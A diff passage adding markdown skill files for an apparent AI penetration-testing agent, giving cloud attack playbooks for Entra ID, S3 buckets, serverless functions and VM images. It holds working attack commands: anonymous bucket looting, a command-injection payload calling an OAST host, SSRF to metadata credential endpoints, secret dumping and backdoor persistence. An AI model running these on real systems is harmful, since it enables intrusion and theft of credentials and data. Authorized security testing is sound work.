+- "Anyone" SharePoint links that are expired or scoped to authenticated org users return 401/403 - not anonymous exposure.
+- Default directory member-read is by-design in many tenants; only flag it if it exceeds the tenant's stated least-privilege posture or leaks sensitive attributes.
+- Service principals owned by Microsoft first-party apps with broad permissions are expected; focus on third-party and customer-created apps.
+
+## Chaining & Impact
+
+- Tenant recon -> validated users -> low-and-slow spray -> single-factor foothold -> `roadrecon` directory map -> over-permissioned app -> app-only Global-Admin-equivalent token -> full tenant control.
+- Phished delegated consent (`Mail.Read` + `offline_access`) -> persistent refresh token -> long-term mailbox access surviving password reset.
+- Leaked client secret in CI/CD -> `client_credentials` app token with `Mail.ReadWrite`/`Files.Read.All` -> org-wide mailbox/file read without any user interaction.
+- Guest foothold in a partner tenant + permissive cross-tenant access -> lateral movement into the primary tenant's directory.
+- AD FS key compromise -> Golden SAML -> impersonate any user including Global Admin, bypassing MFA entirely.
+- Conditional Access gap on legacy auth -> EWS/IMAP access to mailboxes that the web UI policy appeared to protect.
+
+## Pro Tips
+
+1. Always decode the token you receive (`jwt_tool`): the `aud`, `scp` (delegated) vs `roles` (application), and `appid` claims tell you exactly what you can touch - more reliable than guessing scopes.
+2. Prefer `roadrecon` for the first authenticated pass: it is read-only, caches to a local DB, and lets you query offline without re-hitting Graph and tripping anomaly detection.
+3. Respect Entra Smart Lockout: spray one password per cycle with long delays; bursts lock accounts and burn the engagement. `MSOLSpray` tells you MFA/CA status per hit so you do not waste good creds on MFA walls.
+4. FOCI (family-of-client-IDs) refresh tokens are reusable across many first-party clients - a token for one Microsoft app frequently redeems for Graph, Teams, or Outlook scopes.
+5. Federated vs managed (from `getuserrealm.srf`) changes everything: federated means the IdP, not Entra, validates passwords, so spraying hits the on-prem AD FS and may dodge cloud lockout - and is louder there.
+6. Device-code phishing is high-yield and low-friction: the victim just enters a code at a legitimate Microsoft URL, so it survives many phishing-awareness controls.
+7. Check `oauth2PermissionGrants` and enterprise-app `appRoleAssignments` before assuming least privilege - admins often org-wide-consent risky third-party apps and forget them.
+8. Cross-tenant access settings and external sharing are the quietest path in; a single over-shared SharePoint site can leak more than a directory dump.

--- a/strix/skills/cloud/s3_bucket.md
+++ b/strix/skills/cloud/s3_bucket.md
@@ -1,0 +1,176 @@
+---
+name: s3_bucket
+description: AWS S3 bucket testing - ACL/policy misconfig, public listing, object exposure, write/takeover, and credential discovery
+---
+
+# AWS S3 Bucket Security Testing
+
+An S3 bucket is a globally-named object store reachable over HTTPS at predictable virtual-host and path-style endpoints. The attacker objective is to convert a bucket name (often leaked in HTML, JS, mobile apps, or DNS) into unauthorized read, write, or full control of objects: list the namespace, exfiltrate sensitive data, overwrite assets served to other users, hijack a dangling bucket reference, or pivot through credentials/IAM trust found inside. Misconfigured bucket ACLs, broad bucket policies, disabled Block Public Access, and the legacy `AllUsers`/`AuthenticatedUsers` grants remain extremely common.
+
+## Attack Surface
+
+**Scope**
+- Bucket itself: ACL, bucket policy, Block Public Access (BPA) settings, ACL ownership, website hosting
+- Object namespace: listing (`ListBucket`), per-object reads (`GetObject`), versions, ACLs
+- Write surface: `PutObject`, `DeleteObject`, multipart uploads, policy/ACL writes
+- Reference integrity: dangling CNAMEs/origins pointing at unclaimed bucket names (takeover)
+
+**Endpoints (a bucket answers on several hosts)**
+- Virtual-host: `https://<bucket>.s3.amazonaws.com/` and regional `https://<bucket>.s3.<region>.amazonaws.com/`
+- Path-style: `https://s3.<region>.amazonaws.com/<bucket>/`
+- Static website: `http://<bucket>.s3-website-<region>.amazonaws.com/` (or `.s3-website.<region>.`)
+- Dualstack/IPv6, transfer-acceleration, and Access Point ARNs as additional aliases
+
+**Where bucket names leak**
+- Hardcoded in HTML/JS bundles, `<img>/<script>/<link>` src, CSS, sourcemaps
+- Mobile app resources (decompiled APK/IPA), CI logs, Terraform/CloudFormation, git history
+- DNS: CNAMEs to `*.s3.amazonaws.com` / `*.cloudfront.net` fronting a bucket
+- Predictable naming: `companyname-{prod,dev,backup,logs,assets,terraform-state,cdn}`
+
+## Recon & Enumeration
+
+Install the asset-specific tools (most others are already in the sandbox):
+```
+pip install awscli s3scanner          # awscli, s3scanner enumerator
+pip install prowler                    # account-wide AWS posture (if creds obtained)
+GO111MODULE=on go install github.com/sa7mon/S3Scanner@latest   # alt enumerator
+```
+
+Resolve and classify the endpoint (region, existence, public bit) with httpx:
+```
+httpx -u "https://<bucket>.s3.amazonaws.com/" -sc -title -location -ct -server -fr
+```
+- `404 NoSuchBucket` = unclaimed (takeover candidate). `403 AccessDenied` = exists, locked.
+- `200` + `<ListBucketResult>` XML = public listing. `301` body reveals the real region (`<Endpoint>`).
+
+Anonymous listing (no creds) via path-style and virtual-host:
+```
+curl -s "https://s3.amazonaws.com/<bucket>/"                    # path-style list
+curl -s "https://<bucket>.s3.<region>.amazonaws.com/?list-type=2&max-keys=1000"
+aws s3 ls "s3://<bucket>" --no-sign-request --recursive | head
+aws s3api list-objects-v2 --bucket <bucket> --no-sign-request --max-items 50
+```
+
+Read ACL / policy / config anonymously and with creds:
+```
+aws s3api get-bucket-acl    --bucket <bucket> --no-sign-request
+aws s3api get-bucket-policy --bucket <bucket> --no-sign-request
+aws s3api get-bucket-policy-status        --bucket <bucket>
+aws s3api get-public-access-block         --bucket <bucket>
+aws s3api get-bucket-website --bucket <bucket> --no-sign-request
+aws s3api get-bucket-versioning --bucket <bucket> --no-sign-request
+```
+
+Bulk/automated enumeration:
+```
+s3scanner scan --bucket <bucket>                       # perms matrix (read/write/acl)
+s3scanner scan -f buckets.txt -threads 30 -enumerate
+nuclei -u "https://<bucket>.s3.amazonaws.com/" -tags s3,aws,bucket,exposure -severity medium,high,critical -silent
+```
+
+Discover candidate bucket names:
+```
+katana -u https://target.tld -jc -d 3 -silent | grep -Eio '[a-z0-9.-]+\.s3[.-][a-z0-9.-]*amazonaws\.com|s3\.amazonaws\.com/[a-z0-9.-]+'
+subfinder -d target.tld -silent | dnsx -cname -resp-only | grep -i 's3\|amazonaws\|cloudfront'
+ffuf -w names.txt -u "https://FUZZ.s3.amazonaws.com/" -mc 200,403 -t 40
+trufflehog filesystem ./app-bundle --only-verified        # AWS keys near bucket refs
+gitleaks detect --source . --no-banner                    # keys + bucket names in git
+```
+
+## Methodology
+
+1. **Collect bucket names.** Crawl the app (katana), grep JS/HTML, decompile mobile apps, scan repos (gitleaks/trufflehog), resolve DNS (dnsx), and generate permutations from the org name. Build `buckets.txt`.
+2. **Confirm existence and region.** httpx each candidate; a `301` returns the canonical region in the XML `<Endpoint>` element. Distinguish `NoSuchBucket` (takeover) from `AccessDenied` (locked) from `200` (open).
+3. **Test anonymous read.** Try `list-objects-v2` and `get-bucket-acl --no-sign-request`. A successful list is the highest-value, lowest-effort finding.
+4. **Read config.** Pull ACL, policy, BPA, versioning, website config. Map exactly which principals (`AllUsers`, `AuthenticatedUsers`, account/ARN, `Principal:"*"`) have which actions.
+5. **Test authenticated-user read.** If you hold ANY valid AWS account (even a free personal one), retry without `--no-sign-request`. `AuthenticatedUsers` grants apply to every AWS account on earth, not just the target's.
+6. **Test write.** Carefully probe `PutObject` with a benign marker, `PutObjectAcl`, `PutBucketPolicy`, and `DeleteObject`. Writable buckets serving site assets are critical (stored XSS / supply-chain).
+7. **Enumerate object contents.** For readable lists, pull versions and sample object ACLs; scan downloaded objects for secrets (trufflehog/gitleaks), credentials, backups, PII.
+8. **Exploit credentials.** Any discovered AWS keys → `aws sts get-caller-identity` → `prowler` / enumerate IAM, other buckets, secrets. Treat as account pivot, minimal-impact only.
+9. **Check takeover.** For dangling references (CNAME/origin to an unclaimed name), validate you can register the bucket name in your own account.
+
+## Key Weaknesses / Techniques
+
+### Public listing (ListBucket to AllUsers)
+The bucket policy or ACL grants `s3:ListBucket` to everyone. Enumerate the full keyspace, paginating past 1000 keys:
+```
+aws s3api list-objects-v2 --bucket <bucket> --no-sign-request --query 'Contents[].Key' --output text
+aws s3api list-object-versions --bucket <bucket> --no-sign-request   # deleted/old sensitive versions
+```
+Listing exposes filenames (often revealing customers, backups, internal tooling) even when individual objects are private.
+
+### Object read exposure (GetObject to AllUsers/AuthenticatedUsers)
+Objects readable even when listing is denied — guess/enumerate keys from leaked references:
+```
+curl -s "https://<bucket>.s3.amazonaws.com/<key>" -o obj.dat
+aws s3 cp "s3://<bucket>" ./loot --no-sign-request --recursive    # if list+get open
+```
+The `AuthenticatedUsers` grant is the classic trap: appears "non-public" in the console but is readable by any AWS account. Always retry with your own signed creds.
+
+### Anonymous / authenticated write (PutObject)
+Writable buckets enable defacement, stored XSS (if HTML/JS is served to users), or malware/supply-chain injection. Validate non-destructively with a unique marker file:
+```
+echo "poc-$(date +%s)" > poc.txt
+aws s3 cp poc.txt "s3://<bucket>/poc-$(openssl rand -hex 4).txt" --no-sign-request
+curl -s -X PUT "https://<bucket>.s3.amazonaws.com/poc-marker.txt" --data "ownership-check"
+```
+If the bucket fronts a website/CDN, overwriting an existing `.js`/`.html` object can yield stored XSS against real users — demonstrate with a benign overwrite, never live JS.
+
+### Policy / ACL takeover
+`s3:PutBucketPolicy`, `s3:PutBucketAcl`, or `s3:PutObjectAcl` granted to `*` lets an attacker grant themselves full control. Confirm the permission exists; do not actually rewrite production policy.
+
+### Bucket takeover (dangling reference)
+A site CNAME/CloudFront origin points to a bucket name that no longer exists (`404 NoSuchBucket`). Register that exact name in your own account in the matching region, host content, and you control what victims load. Confirm the dangling reference first via `dig`/`httpx`.
+
+### Credentials & misconfig inside objects
+Backups, `.env`, `terraform.tfstate`, `.git`, DB dumps, and config frequently sit in readable buckets:
+```
+trufflehog s3 --bucket <bucket> --no-verification           # if you have read creds
+grep -rEi 'AKIA[0-9A-Z]{16}|aws_secret|password|BEGIN .* PRIVATE KEY' ./loot
+```
+
+### Related misconfigs
+- BPA disabled at account or bucket level (lets ACLs go public)
+- `BucketOwnerPreferred`/ACLs-enabled with cross-account `WRITE`
+- Pre-signed URLs with long TTLs leaked in logs/referrers
+- Website hosting enabling open redirect via routing rules
+
+## Validation
+
+1. **Listing:** Capture the `<ListBucketResult>` XML or `list-objects-v2` JSON showing real keys. Note whether anonymous (`--no-sign-request`) or authenticated, and via which endpoint.
+2. **Read:** Download one non-sensitive object and record HTTP 200 + a content hash; for sensitive data, document the key name and a redacted snippet only — do not exfiltrate at scale.
+3. **Write:** Upload a uniquely-named, benign marker (`poc-<random>.txt`), re-fetch it over HTTPS to prove persistence, then delete it if you also hold delete rights. Record request/response.
+4. **Principal mapping:** Save the exact ACL grant or policy statement (`Principal`, `Action`, `Resource`) that authorized the access — this is the root-cause evidence.
+5. **Takeover:** Show the dangling reference (`dig`/curl returning `NoSuchBucket`) and, in your own account, that the name is registrable; serve a harmless marker page to confirm victim-path control.
+6. **Credentials:** `aws sts get-caller-identity --output json` proves a discovered key is live and shows the account/principal it maps to.
+
+## False Positives
+
+- `403 AccessDenied` on root `/` is NOT a finding — the bucket exists but is locked; many buckets answer 403 by design.
+- `200` with an empty `<ListBucketResult>` (`<KeyCount>0</KeyCount>`) = public but empty; low/no impact unless writable.
+- CloudFront-fronted buckets returning 403 directly while serving fine via the CDN are usually intentional (Origin Access Control).
+- Objects meant to be public (marketing assets, public website files) — read access is expected; rule out by intended use.
+- A "writable" result that is actually a misleading 200 from a proxy/WAF, not S3 — confirm the object is retrievable from the canonical `s3.amazonaws.com` host.
+- Pre-signed URL access is time-bounded and intended; not a misconfig unless the URL is leaked/over-long-lived.
+- Buckets owned by AWS or third parties out of scope — verify ownership before reporting.
+
+## Chaining & Impact
+
+- Public listing → object read → secrets (`.env`, keys, tfstate) → `sts get-caller-identity` → IAM/account pivot → other buckets, RDS snapshots, Secrets Manager.
+- Writable asset bucket served via CDN → overwrite JS → stored XSS / drive-by against every site visitor → session/account takeover.
+- Bucket takeover of a dangling origin → serve attacker content under the victim's domain → phishing, cookie theft, supply-chain.
+- tfstate read → full infra map + embedded secrets → broad cloud compromise.
+- Cross-account write/ACL grant → persistence and lateral movement within the target AWS org.
+- Versioning + readable old versions → recover data that was "deleted," including rotated credentials still valid.
+
+## Pro Tips
+
+1. Always retry every read/list both anonymously (`--no-sign-request`) AND with a signed throwaway AWS account — `AuthenticatedUsers` grants are invisible to the first method and are extremely common.
+2. A `301` is a gift: parse the `<Endpoint>`/`<Bucket>` XML to get the canonical region instead of brute-forcing all regions.
+3. `list-object-versions` and delete markers expose data that simple listing hides; check them whenever versioning is on.
+4. Bucket names are a global namespace — leaked names from dev/staging/CI (`-dev`, `-backup`, `-logs`, `-terraform-state`) are often far more exposed than prod.
+5. Distinguish bucket ACL vs object ACL vs bucket policy vs BPA: a "private" bucket can still have individual world-readable objects (per-object ACL).
+6. When a bucket fronts a website, test `?list-type=2` on both the REST endpoint and the `s3-website-` endpoint — behavior and exposure differ.
+7. Keep write PoCs to uniquely-named marker files and clean up; never overwrite or delete existing production objects to prove the point.
+8. Feed discovered AWS keys to `prowler` for fast, read-only account-wide posture rather than manually walking the API.
+9. Use `httpx -fr` so redirects to the real regional endpoint are followed and classified in one pass.

--- a/strix/skills/cloud/serverless_function.md
+++ b/strix/skills/cloud/serverless_function.md
@@ -1,0 +1,202 @@
+---
+name: serverless_function
+description: Serverless function testing (Lambda/Cloud Functions/Azure Functions) - event injection, IAM scope abuse, secrets/runtime exposure, and cloud pivot
+---
+
+# Serverless Function Security Testing
+
+A serverless function (AWS Lambda, GCP Cloud Functions/Run, Azure Functions, Cloudflare/Vercel/Netlify edge functions) is a short-lived, event-driven unit of code that runs with an attached cloud identity and whatever environment/secrets the platform injects. The attacker objective is to convert an invocation path (an HTTP endpoint, an event the attacker can place into a queue/bucket/topic, or a leaked function URL/ARN) into code behavior the function never intended: inject malicious event data to reach a dangerous sink, abuse the function's over-scoped IAM role to read secrets and pivot across the account, harvest credentials and config from the runtime environment, and exploit vulnerable runtime/dependency surface. Because the function's identity is usually far broader than its job, a single injection often escalates straight into cloud-account compromise.
+
+## Attack Surface
+
+**Invocation paths (how attacker-controlled data reaches the handler)**
+- HTTP: API Gateway / Lambda Function URLs (`*.lambda-url.<region>.on.aws`), GCP `*.cloudfunctions.net` / `*.run.app`, Azure `*.azurewebsites.net/api/<fn>`, edge functions on the app domain
+- Event sources: S3 `ObjectCreated`, SQS/SNS, Kinesis/EventBridge, GCP Pub/Sub, Azure Queue/Event Grid, DynamoDB Streams
+- Direct invoke with creds: `aws lambda invoke`, `gcloud functions call`, `az functionapp` if the principal has `lambda:InvokeFunction` / equivalent
+- Cron/schedule triggers and step-function/orchestration inputs
+
+**What the function exposes**
+- The event object: every field (headers, query, path, body, `requestContext`, S3 key, message attributes) is attacker-influenced and frequently trusted as control data
+- The execution identity: Lambda role (STS), GCP service account, Azure managed identity — reachable via the metadata/credential endpoint inside the sandbox
+- Environment: env vars (often hold DB URLs, API keys, secret ARNs), `/tmp` (writable, persists across warm invocations), the bundled deployment package and layers, build-time `.env`/config
+- The runtime: language version, dependency tree, and any spawned subprocess/shell
+
+**Where function identifiers leak**
+- Function URLs/ARNs in HTML/JS bundles, mobile apps, CORS configs, IaC (`serverless.yml`, `template.yaml`, Terraform), CI logs and git history
+- API Gateway stages/paths in OpenAPI/Swagger; default `/dev`, `/prod`, `/staging` stages
+- Error pages leaking the runtime, handler path, and stack traces with internal ARNs
+
+## Recon & Enumeration
+
+Most tools are already in the sandbox. Install the cloud/serverless-specific ones:
+```
+pip install awscli prowler scoutsuite          # AWS API + account posture
+# az: curl -sL https://aka.ms/InstallAzureCLIDeb | bash
+# gcloud: curl -sSL https://sdk.cloud.google.com | bash
+go install github.com/projectdiscovery/cdncheck/cmd/cdncheck@latest
+pipx install lambdaguard                        # Lambda IAM/posture auditor (read creds)
+```
+
+Find and classify function endpoints from the app:
+```
+katana -u https://target.tld -jc -d 3 -silent | grep -Eio '[a-z0-9-]+\.lambda-url\.[a-z0-9-]+\.on\.aws|[a-z0-9-]+\.cloudfunctions\.net|[a-z0-9-]+\.run\.app|[a-z0-9-]+\.azurewebsites\.net'
+subfinder -d target.tld -silent | httpx -silent -title -sc -tech-detect -server -cl
+httpx -l fn_endpoints.txt -sc -title -ct -location -server -fr -mc 200,301,302,401,403
+```
+
+Map API Gateway stages and routes:
+```
+ffuf -w stages.txt -u "https://<api-id>.execute-api.<region>.amazonaws.com/FUZZ/" -mc 200,401,403
+ffuf -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -u "https://<host>/prod/FUZZ" -mc all -fc 404
+```
+
+Scan for serverless-specific exposures and secrets:
+```
+nuclei -l fn_endpoints.txt -tags aws,lambda,gcp,azure,exposure,misconfig,cve -severity medium,high,critical -silent -j -o nuclei_fn.jsonl
+trufflehog filesystem ./deployment-package --only-verified      # secrets in the bundled artifact
+gitleaks detect --source . --no-banner                          # keys + ARNs in IaC/git
+semgrep --config p/serverless --config p/secrets ./src          # injection/SSRF/eval sinks
+trivy fs --scanners vuln,secret,misconfig ./deployment-package  # vulnerable deps + IaC
+```
+
+With (or after obtaining) cloud credentials — enumerate functions, code, env, and the role:
+```
+aws sts get-caller-identity
+aws lambda list-functions --query 'Functions[].[FunctionName,Runtime,Role]' --output table
+aws lambda get-function --function-name <fn> --query 'Code.Location' --output text   # presigned code URL
+aws lambda get-function-configuration --function-name <fn> --query 'Environment.Variables'
+aws lambda get-policy --function-name <fn>           # resource policy: who can invoke
+aws lambda get-function-url-config --function-name <fn>   # AuthType NONE = public
+gcloud functions describe <fn> --format='value(serviceConfig.environmentVariables,serviceConfig.serviceAccountEmail)'
+az functionapp config appsettings list -g <rg> -n <app>
+prowler aws -s awslambda                              # Lambda misconfig checks
+```
+
+## Methodology
+
+1. **Collect identifiers.** Crawl the app (katana), grep JS/mobile/IaC for function URLs, ARNs, and API Gateway IDs. Pull secrets/ARNs from git and the deployment artifact (gitleaks/trufflehog). Build `fn_endpoints.txt`.
+2. **Classify each endpoint.** httpx for status/auth. A Lambda Function URL with `AuthType: NONE`, an open API Gateway stage, or a `403`-but-reachable function is the entry point. Note runtime/server headers.
+3. **Map the event shape.** Determine how input reaches the handler (HTTP body/headers/path, or an event source you can write to — e.g. an S3 bucket the function watches). Identify which event fields become control data (filenames, IDs, `Authorization`, `requestContext.authorizer`).
+4. **Test event injection.** Fuzz every event field into the function's sinks: command exec, eval, SQL/NoSQL, path traversal, SSRF, deserialization, template engines. Use OAST callbacks for blind cases.
+5. **Reach the credential endpoint.** If you achieve SSRF/RCE/file-read inside the function, pull the execution role's STS creds from the metadata endpoint or env (`AWS_*`, `GCP`, `IDENTITY_ENDPOINT`).
+6. **Assess IAM scope.** With the function's creds, enumerate what the role can actually do (`get-caller-identity`, simulate-principal-policy, prowler). Over-scoped roles (`*:*`, full S3/Secrets/DynamoDB) are the escalation pivot.
+7. **Harvest runtime exposure.** Read env vars, `/tmp`, bundled secrets, layers, and resolve secret ARNs the role can read (Secrets Manager / SSM / KMS).
+8. **Exploit dependencies/runtime.** Cross-check the dependency tree (trivy/grype) for RCE-class CVEs reachable from the handler path; test for outdated runtime EOL.
+9. **Pivot and chain.** Use the role to reach other functions, buckets, databases, queues; check for warm-container persistence in `/tmp` and for write access to the function's own code/config (re-deploy backdoor). Keep impact minimal-impact, evidence-only.
+
+## Key Weaknesses / Techniques
+
+### Event-data injection into dangerous sinks
+Handlers routinely pass event fields straight into shells, queries, or evaluators. Probe each field independently.
+```
+# Command injection via an event field consumed by child_process/os.system/subprocess
+curl -s "https://<fn-url>/" -H 'Content-Type: application/json' \
+  -d '{"file":"x; curl http://<oast-id>.oast.fun/`whoami`","name":"$(id)"}'
+# NoSQL / SQL via body or query
+curl -s "https://<fn-url>/?id[$ne]=1"
+curl -s "https://<fn-url>/" -d '{"user":{"$gt":""},"pass":{"$gt":""}}'
+# Path traversal into a runtime/file sink (read bundled source/secrets)
+curl -s "https://<fn-url>/?path=../../../../proc/self/environ"
+```
+For event-source triggers, inject via the source you can write: upload an S3 object whose **key** contains the payload, or publish an SQS/SNS message with crafted `MessageAttributes` — the key/attribute is the injection vector when the handler shells out on it.
+
+### SSRF to the credential endpoint (the fastest escalation)
+Any function-side fetch reaches the platform credential service. See the ssrf skill for full payloads.
+```
+# AWS: env already holds creds, but SSRF/RCE confirms reach
+curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/   # then /<role>
+# GCP / Cloud Run
+curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
+# Azure Functions managed identity
+curl -s "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" -H "X-IDENTITY-HEADER: $IDENTITY_HEADER"
+```
+
+### Over-scoped execution role (IAM privilege escalation)
+The role attached to the function is the prize. Confirm exactly what it can do, then find an escalation primitive (`iam:PassRole`+`lambda:CreateFunction`, `iam:CreateAccessKey`, `sts:AssumeRole`, `secretsmanager:GetSecretValue`, broad `s3:*`).
+```
+export AWS_ACCESS_KEY_ID=... AWS_SECRET_ACCESS_KEY=... AWS_SESSION_TOKEN=...   # from the function
+aws sts get-caller-identity
+aws iam simulate-principal-policy --policy-source-arn <role-arn> \
+  --action-names secretsmanager:GetSecretValue iam:PassRole s3:GetObject lambda:UpdateFunctionCode
+aws secretsmanager list-secrets && aws secretsmanager get-secret-value --secret-id <arn>
+aws ssm get-parameters-by-path --path / --recursive --with-decryption
+```
+
+### Runtime / environment exposure
+Env vars and the deployment package leak credentials and config.
+```
+# Inside the function (via RCE/SSRF-to-file) or via the API:
+aws lambda get-function-configuration --function-name <fn> --query 'Environment.Variables'
+env | grep -Ei 'key|secret|token|password|conn|url|dsn'
+# Download and inspect the actual code artifact
+curl -s "$(aws lambda get-function --function-name <fn> --query Code.Location --output text)" -o fn.zip
+unzip -o fn.zip -d fn && trufflehog filesystem ./fn --only-verified
+```
+
+### Vulnerable dependencies & EOL runtime
+Functions ship a frozen dependency tree and are rarely patched.
+```
+trivy fs --scanners vuln ./fn --severity HIGH,CRITICAL
+grype dir:./fn
+# Confirm runtime is supported; EOL runtimes (e.g. nodejs12.x, python3.7) no longer get patches
+aws lambda get-function-configuration --function-name <fn> --query 'Runtime'
+```
+A reachable RCE-class CVE in a parser (image/XML/archive/deserialization lib) on the handler path yields direct code execution with the role.
+
+### Public/abusable invocation & resource policy
+A Function URL with `AuthType: NONE`, an API Gateway route with no authorizer, or a resource policy granting `Principal:"*"` lets anyone invoke directly — and IAM-auth-bypass via misconfigured authorizers (returning Allow on error) is common.
+```
+aws lambda get-function-url-config --function-name <fn>   # look for "AuthType": "NONE"
+aws lambda get-policy --function-name <fn> | jq -r '.Policy | fromjson'
+```
+
+### Warm-container & /tmp persistence
+`/tmp` (and process memory) persist across warm invocations of the same container. State written by one request can be read by a later attacker request, and a poisoned `/tmp` cache or imported module can backdoor subsequent invocations until the container recycles.
+
+### Denial-of-wallet / resource abuse
+Unauthenticated, expensive functions (heavy compute, fan-out, recursive triggers — e.g. a function that writes to the bucket that triggers it) enable cost-amplification DoS. Note recursion risk; do not actually run up cost.
+
+## Validation
+
+1. **Injection:** Capture the request and the proof of execution — an OAST callback from `<oast-id>.oast.fun` (use `interactsh-client -v`), a reflected `id`/`whoami` in the response, or a time-based delay. Record the exact event field that carried the payload.
+2. **Credential reach:** Show the metadata/STS response (redacted) and prove the creds are live: `aws sts get-caller-identity` returns the function's role ARN.
+3. **IAM scope:** Save the `simulate-principal-policy` output or a single successful privileged read (e.g. one `get-secret-value` returning a non-sensitive/redacted secret) that demonstrates over-scope. Do not bulk-exfiltrate.
+4. **Runtime exposure:** Document the env-var key names and one resolved secret ARN (value redacted), plus the code-artifact source proving secrets were bundled.
+5. **Public invoke:** Show `AuthType: NONE` or the wildcard resource policy, then a successful unauthenticated invocation returning function output.
+6. **Dependency CVE:** Pin the vulnerable package+version (trivy/grype) and demonstrate the sink is reachable from the handler — not merely present in the bundle.
+
+## False Positives
+
+- A Function URL or `*.cloudfunctions.net` returning `403`/`401` is reachable but auth-protected — not a finding unless the authorizer is bypassable.
+- Env vars present but holding only non-secret config (region, log level, feature flags) — verify the value is actually sensitive.
+- The execution role appears broad in a deny-by-default org SCP / permission boundary that actually blocks the action — confirm with `simulate-principal-policy`, not just the attached policy JSON.
+- A dependency CVE flagged by trivy/grype that is in the bundle but not on any code path the event can reach (dead/dev dependency) — prove reachability.
+- `169.254.169.254` reachable but creds endpoint returns 401/blocked (IMDSv2-style hop limit / metadata disabled) — egress works, escalation does not.
+- API Gateway returning a generic Lambda error / 502 — runtime fault, not injection, unless the response leaks a controlled value.
+- Stack traces in `dev`/`staging` stages that are intentionally verbose and isolated from prod data.
+
+## Chaining & Impact
+
+- Event injection → RCE/SSRF in the handler → pull execution-role STS creds → over-scoped role → Secrets Manager/SSM → DB and other-service credentials → broad account compromise.
+- Public Function URL (`AuthType: NONE`) → unauthenticated invoke → injection → same credential pivot, with no auth needed.
+- S3 `ObjectCreated` trigger + writable bucket → upload object whose key is a command payload → code execution inside the function with the role.
+- `iam:PassRole` + `lambda:CreateFunction`/`UpdateFunctionCode` in the role → deploy attacker code under a higher-privileged role → privilege escalation and persistence.
+- Bundled `.env`/secrets in the deployment artifact → cloud + third-party API keys → lateral movement beyond the cloud account (SaaS, payment, email).
+- Write access to the function's own code/config → persistent backdoor invoked on every future event.
+- Recursive/self-triggering function → denial-of-wallet cost amplification.
+
+## Pro Tips
+
+1. The execution role is almost always the highest-value target — once any code runs in the function, go straight for STS creds and `simulate-principal-policy`; the injection is just the door.
+2. On Lambda, you usually don't need IMDS at all: `AWS_ACCESS_KEY_ID`/`AWS_SECRET_ACCESS_KEY`/`AWS_SESSION_TOKEN` are already in the environment — dumping env via file-read is equivalent to credential theft.
+3. Test the non-HTTP triggers, not just the URL: an S3 key, an SNS message attribute, or a DynamoDB stream record is attacker-controlled input that bypasses the API Gateway/WAF that "protects" the function.
+4. Download the actual deployment package (`Code.Location` presigned URL) — it reveals the handler, hardcoded secrets, and the real dependency versions, often more than the live endpoint does.
+5. `/tmp` and warm containers give you cross-invocation state — useful for staging multi-step payloads and for spotting cache-poisoning persistence.
+6. Always run injection probes through `interactsh-client` first; serverless RCE is frequently blind (no response body), and the OAST hit is your only oracle.
+7. Check `AuthType: NONE` and the resource policy (`get-policy`) separately from API Gateway auth — a function fronted by an authenticated gateway can still be directly invocable via its Function URL or `lambda:InvokeFunction`.
+8. EOL runtimes (`nodejs12.x`, `python3.7`, old .NET) are a reliable tell for an unmaintained function with vulnerable, unpatched dependencies.
+9. Feed any harvested role creds to `prowler`/`scoutsuite` for fast read-only account posture rather than walking the API by hand — and stop at minimal-impact evidence.
+
+## Summary
+
+A serverless function is a thin layer of attacker-influenced event data sitting on top of an over-privileged cloud identity. The reliable chain is: inject into an event field → execute or fetch inside the sandbox → grab the execution role's credentials → exploit its excessive IAM scope into the wider account. Test every event source, not just the HTTP path; treat the role and the bundled artifact as the real targets.

--- a/strix/skills/cloud/vm_image.md
+++ b/strix/skills/cloud/vm_image.md
@@ -1,0 +1,178 @@
+---
+name: vm_image
+description: Offline analysis of container and VM images for leaked secrets, CVEs, and misconfigurations by mounting and scanning the filesystem and layer history.
+---
+
+# Container / VM Image Assessment
+
+A container image (Docker/OCI tarball, registry reference, or saved layers) or a VM disk image (QCOW2, VMDK, VDI, AMI/raw, OVA) is a frozen, shippable filesystem plus metadata. Unlike a live host, every artifact is inert and fully inspectable offline: build history, environment variables, package versions, embedded credentials, and dead-but-recoverable layers are all on disk. The attacker's objective is to recover anything that grants access elsewhere — long-lived cloud keys, private keys, hardcoded passwords, tokens baked into early layers and "deleted" later, plus exploitable CVEs and runtime misconfigurations (root user, setuid binaries, world-writable paths) that enable escape or escalation once the image runs. Treat the image as a credential and CVE dump first, a runtime target second.
+
+## Attack Surface
+
+**Image formats and entry points**
+- Container images: `image.tar` (`docker save`), OCI layout dirs, registry refs (`registry.tld/ns/app:tag`), individual `layer.tar` blobs
+- VM disk images: `.qcow2`, `.vmdk`, `.vdi`, `.vhd/.vhdx`, raw `.img`, `.ova`/`.ovf` bundles, cloud AMI snapshots
+- Build metadata: image config JSON (`Config.Env`, `Config.Cmd`, `Config.Entrypoint`, `History`), `manifest.json`, `repositories`
+- Registry exposure: anonymous-pullable private registries, `/v2/_catalog`, unauthenticated registry API on :5000
+
+**What is exposed once you have the artifact**
+- Every file in every layer, including files removed in later layers (whiteout files do not delete data)
+- Per-layer build commands (often contain inlined secrets: `RUN export AWS_SECRET=...`)
+- Environment variables and entrypoint scripts that fetch or hold credentials at runtime
+- Installed OS and language packages with exact versions → direct CVE mapping
+- SSH host/user keys, cloud config (`/root/.aws`, `/home/*/.config/gcloud`), kube configs, `.npmrc`, `.git-credentials`
+- VM images additionally expose shell history, cron, systemd units, `/etc/shadow`, and persistent data partitions
+
+## Recon & Enumeration
+
+Install the core image-analysis stack (Kali/Ubuntu sandbox). Trivy, syft, grype, gitleaks, and trufflehog are the workhorses:
+
+```
+# Trivy (CVEs + secrets + misconfig in one tool)
+curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
+# Syft (SBOM) + Grype (vuln match against SBOM)
+curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | sh -s -- -b /usr/local/bin
+curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin
+# Secret scanners
+curl -sSfL https://raw.githubusercontent.com/trufflesecurity/trufflehog/main/scripts/install.sh | sh -s -- -b /usr/local/bin
+# gitleaks (Git history of layers / .git dirs left in images)
+GLV=$(curl -s https://api.github.com/repos/gitleaks/gitleaks/releases/latest | jq -r .tag_name); \
